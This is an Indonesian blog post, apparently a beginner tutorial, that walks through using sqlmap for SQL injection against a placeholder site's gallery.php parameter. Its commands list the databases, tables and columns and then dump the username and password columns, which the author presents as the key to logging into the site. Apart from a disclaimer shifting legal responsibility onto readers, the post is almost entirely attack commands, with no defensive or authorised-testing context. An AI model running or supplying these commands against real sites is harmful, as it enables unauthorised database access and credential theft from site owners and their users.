ane akan coba sharing tentang penggunaan SQLMAP, walaupun terkesan sudah basi karena banyaknya tutorial - tutorial tentang sqlmap yang lebih baik, ini cuma sebagai bahan untuk belajar...semua kegiatan / perbuatan yang melanggar hukum dengan adanya tutorial ini adalah menjadi tanggung jawab masing - masing.
pertama jalankan dari terminal console
Mencari DATABASE
root@muring:~/pentest/database/sqlmap/python sqlmap.py -u http://target.com/gallery.php?cat=-3 --dbs
setelah databasenya didapatkan dilanjutkan dengan...
Mencari TABEL
root@muring:~/pentest/database/sqlmap/python sqlmap.py -u http://target.com/gallery.php?cat=-3 -D databasenya --tables
Database sudah didapat, Tabelnyapun sudah didapat, selanjutnya...
Mencari KOLOM
root@muring:~/pentest/database/sqlmap/python sqlmap.py -u http://target.com/gallery.php?cat=-3 -D databasenya -T tabelnya --columns
terdapat dua kolom USERNAME dan PASSWORD yang mana ini adalah kunci untuk masuk ke website tersebut...
USERNAME :
root@muring:~/pentest/database/sqlmap/python sqlmap.py -u http://target.com/gallery.php?cat=-3 -D databasenya -T tabelnya -C username --dump
PASSWORD :
root@muring:~/pentest/database/sqlmap/python sqlmap.py -u http://target.com/gallery.php?cat=-3 -D databasenya -T tabelnya -C password --dump
Sekian terima kasih...
No comments:
Post a Comment
Silakan berikan komentar anda......